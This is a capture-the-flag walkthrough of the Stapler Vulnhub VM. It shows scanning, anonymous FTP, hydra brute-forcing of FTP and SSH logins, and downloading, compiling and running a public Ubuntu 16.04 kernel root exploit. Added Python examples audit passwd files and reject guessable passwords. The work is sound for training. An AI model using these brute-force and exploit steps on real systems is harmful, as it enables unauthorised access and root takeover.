Stapler CTF VM — Vulnhub.com

netdiscover -r (ip range) found the VM's IP address.

nmap (ip range) found:
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql

root@kali:~# ftp (ip range)
Connected to 192.168.1.104.
220-
220-| — — — — — — — — — — — — — — — — — — — — — — — — — — — — — –|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-| — — — — — — — — — — — — — — — — — — — — — — — — — — — — — –|
220-
220 
Name (192.168.1.104:root):

It seems the box allows anonymous FTP logins.

Name (192.168.1.104:root): Anonymous
(and then just pressed Enter at the password prompt).
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

ftp> ls

200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 23:06 note
226 Directory send OK.

ftp> get note

local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
226 Transfer complete.
107 bytes received in 0.00 secs (293.5174 kB/s)

ftp> exit

root@kali:~# cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

(This gives us a few user names to think about.)

HARRY
JOHN
ELLY

I think this is all we can get from the FTP port, so let's move on and try SSH (we don't have the password for this yet, but it's worth a try).

ssh (ip range)
 — — — — — — — — — — — — — — — — — — — — — –
~ Barry, don’t forget to put a message here ~
 — — — — — — — — — — — — — — — — — — — — — –
root@192.168.1.104’s password:

I didn't have the password, but I did get another user name to add to the list.

BARRY

I decided to try hydra on the FTP server with the user names I've found so far.

hydra -l elly -e nsr ftp://(ip range)

[21][ftp] host: 192.168.1.104 login: elly password: ylle

******** PASSWORD FOUND FOR USER elly ***********

I logged back into the FTP server as elly and found a passwd file that I can use as a source of user names to work against.

I found this command on the IRC for the vm.

awk -F':' '{ print $1 }' passwd > users

I used it to pull only the first field from each line of the passwd file, so I ended up with a file called users containing just the user names.

cat users

root
daemon
bin
sys
sync
games
man
etc.
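The awk one-liner above keeps only field 1 of each passwd record. As an added example (not code from the original write-up), here is a small passwd(5) parser in Python that does the same thing and goes one step further for a hardening review: it also reports which accounts have an interactive shell (the only ones a password-guessing run against SSH could actually use, so where password policy and lockout matter) and which have UID 0. The passwd text, including the second UID 0 account, is constructed for the demo; the VM's real file is not reproduced here.

```python
"""Added example: parse /etc/passwd records and audit them.

Not part of the original write-up. The sample passwd content below is
constructed for the demo.
"""
from dataclasses import dataclass
from typing import List

# Shells that do not give an interactive login (conventional values on
# Debian/Ubuntu systems).
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


@dataclass
class PasswdEntry:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd(5) records: name:passwd:uid:gid:gecos:home:shell."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), gecos, home, shell))
    return entries


def usernames(entries: List[PasswdEntry]) -> List[str]:
    """Same result as: awk -F':' '{ print $1 }' passwd"""
    return [e.name for e in entries]


def interactive_accounts(entries: List[PasswdEntry]) -> List[str]:
    """Accounts whose shell allows an interactive login."""
    return [e.name for e in entries if e.shell not in NOLOGIN_SHELLS]


def uid0_accounts(entries: List[PasswdEntry]) -> List[str]:
    """Every account with UID 0 is root, whatever it is called."""
    return [e.name for e in entries if e.uid == 0]


# Constructed sample (not the VM's real passwd file).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
elly:x:1001:1001:Elly:/home/elly:/bin/bash
toor:x:0:0:second root:/root:/bin/sh
"""

if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    print("all users:        ", usernames(entries))
    print("interactive shell:", interactive_accounts(entries))
    print("uid 0:            ", uid0_accounts(entries))
```

A review would lock or remove any interactive account that no one needs and treat a second UID 0 entry as a finding in its own right.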

I used hydra to brute-force the SSH login.

I first ran this command

hydra -e nsr -l ./users ssh 192.168.1.132

but I got an error because the -l option is for a single user name, not the list I specified. So I ran hydra -h and found out that -L is the option to load a user name file; also, the ssh part goes at the end of the command.

hydra -e nsr -L ./users 192.168.1.132 ssh

[22][ssh] host: 192.168.1.132 login: SHayslett password: SHayslett

******** PASSWORD FOUND FOR SSH CONNECTION ***********
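Both passwords found above fall into the three classes that hydra's -e nsr option tries first: n = null (empty), s = same as the login name, r = the login name reversed (elly/ylle is the reversed case, SHayslett/SHayslett the same-as-login case). As an added example (not code from the original write-up), here is a set-password-time check in Python that rejects exactly those classes, so a service never holds the credentials a default hydra run guesses first. The function names and the sample credentials are constructed for the demo.

```python
"""Added example: reject passwords in hydra's "-e nsr" classes at set time.

Not part of the original write-up; names and samples are constructed.
"""
from typing import List, Optional


def trivial_password_class(username: str, password: str) -> Optional[str]:
    """Return which "-e nsr" class the password falls into, or None.

    The comparison is case-insensitive on purpose: "Elly"/"ylle" is no
    stronger than "elly"/"ylle", and many services treat user names
    case-insensitively anyway.
    """
    u = username.strip().lower()
    p = password.lower()
    if p == "":
        return "null"             # hydra -e n
    if p == u:
        return "same-as-login"    # hydra -e s
    if p == u[::-1]:
        return "reversed-login"   # hydra -e r
    return None


def validate_new_password(username: str, password: str, min_length: int = 12) -> List[str]:
    """Collect every policy violation so the user sees all of them at once.

    An empty list means the password is acceptable under this policy.
    """
    problems = []
    cls = trivial_password_class(username, password)
    if cls is not None:
        problems.append(f"password is trivially guessable ({cls})")
    if len(password) < min_length:
        problems.append(f"password shorter than {min_length} characters")
    return problems


if __name__ == "__main__":
    # Constructed sample: the two credentials from the write-up, an empty
    # password, and one that passes.
    samples = [
        ("elly", "ylle"),
        ("SHayslett", "SHayslett"),
        ("barry", ""),
        ("harry", "correct-horse-battery-staple"),
    ]
    for user, pw in samples:
        print(f"{user:10s} -> {validate_new_password(user, pw) or ['ok']}")
```

The same function can be run over an existing credential store at audit time wherever the plaintext is available at the point of setting it (for example in a PAM or web-app password-change hook); it cannot be applied retroactively to hashes, which is why the check belongs at set time.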

ssh 192.168.1.132 -l SHayslett

Logged in as SHayslett

Let's take a look at what version of Linux the box is running with the command:

cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"

I then went to Exploit-DB at https://www.exploit-db.com/, searched for Ubuntu 16.04 and found 3 vulnerabilities:

Linux Kernel 4.4.0-2 (Ubuntu 16.04) - netfilter target_offset OOB Local Root Exploit
Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps

The second one is what I was looking for:
Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit

Reading the exploit and following the steps, I managed to get root access and found the flag. Below are the commands I used and the mistakes I made trying to get the exploit to work.

SHayslett@red:/$ ebpf_mapfd_doubleput$ ./compile.sh
bash: ebpf_mapfd_doubleput$:
command not found

SHayslett@red:/$ /ebpf_mapfd_doubleput$ ./compile.sh
bash: /ebpf_mapfd_doubleput$:
No such file or directory

SHayslett@red:/$ wget https://www.exploit-db.com/download/39772
--2016-07-13 16:19:03--  https://www.exploit-db.com/download/39772
Resolving
www.exploit-db.com (www.exploit-db.com)… 192.124.249.8
Connecting to
www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 5367 (5.2K) [application/txt]
39772: Permission denied

Cannot write to '39772' (Success).

I thought I had it at this point but wasn't sure, as the "Cannot write to '39772'" message didn't fill me with confidence.

I headed back over to the Exploit-DB page and saw that there was a mirror of the file at https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip

So I re-ran the command using the mirror address.

SHayslett@red:/$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
--2016-07-13 16:22:15--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Resolving github.com (github.com)… 192.30.253.112
Connecting to github.com (github.com)|192.30.253.112|:443… connected.
HTTP request sent, awaiting response… 302 Found
Location:
https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
--2016-07-13 16:22:15--
https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)… 151.101.60.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.60.133|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 7115 (6.9K) [application/zip]
39772.zip: Permission denied

Cannot write to '39772.zip' (Success).

Again I thought I had it sorted, so I decided to change directory into the /tmp folder to see if the download had worked.

SHayslett@red:/$ cd tmp
SHayslett@red:/tmp$ ls

asdf.py vmware-root

Nope!!!! I was stuck at this point, so as a last-ditch attempt before moving on and trying something different, I decided to run the commands again whilst in the /tmp folder.

SHayslett@red:/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
--2016-07-13 16:24:51--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
Resolving github.com (github.com)… 192.30.253.112
Connecting to github.com (github.com)|192.30.253.112|:443… connected.
HTTP request sent, awaiting response… 302 Found
Location:
https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
--2016-07-13 16:24:51--
https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)… 151.101.16.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.16.133|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 7115 (6.9K) [application/zip]
Saving to: '39772.zip'

39772.zip 100%[===================>] 6.95K --.-KB/s in 0s

2016-07-13 16:24:51 (30.0 MB/s) - '39772.zip' saved [7115/7115]

BOOM!! It worked. wget saves into the current directory, and SHayslett has no write access to /, which is what the earlier "Permission denied" was about; running it from /tmp avoids that. I'll try to remember this for future use.

SHayslett@red:/tmp$ unzip *
Archive: 39772.zip
caution: filename not matched: asdf.py
caution: filename not matched: vmware-root

SHayslett@red:/tmp$ unzip 39772.zip 
Archive: 39772.zip
 creating: 39772/
 inflating: 39772/.DS_Store 
 creating: __MACOSX/
 creating: __MACOSX/39772/
 inflating: __MACOSX/39772/._.DS_Store 
 inflating: 39772/crasher.tar 
 inflating: __MACOSX/39772/._crasher.tar 
 inflating: 39772/exploit.tar 
 inflating: __MACOSX/39772/._exploit.tar

SHayslett@red:/tmp$ cd 39772

SHayslett@red:/tmp/39772$ ls
crasher.tar exploit.tar

SHayslett@red:/tmp/39772$ tar xf exploit.tar 
SHayslett@red:/tmp/39772$ ls

SHayslett@red:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit

SHayslett@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c

SHayslett@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function 'make_setuid':

doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
 .insns = (__aligned_u64) insns,
 ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
 .license = (__aligned_u64)""
 ^

SHayslett@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c

SHayslett@red:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now…

***** WooHoo we have root access *****

From here getting the flag was easy.

root@red:/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root

root@red:/root# ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql

root@red:/root# cat flag.txt

b6b545dc11b7a270f4bad23432190c75162c4a2b

That was a really nice and fairly easy CTF. I would highly recommend it to anyone who has a few hours spare.

Huge thanks as always to g0tmilk for creating the VM and to vulnhub.com for hosting this and all the other amazing VMs on their site.

Originally published at pentestingandctf.tumblr.com.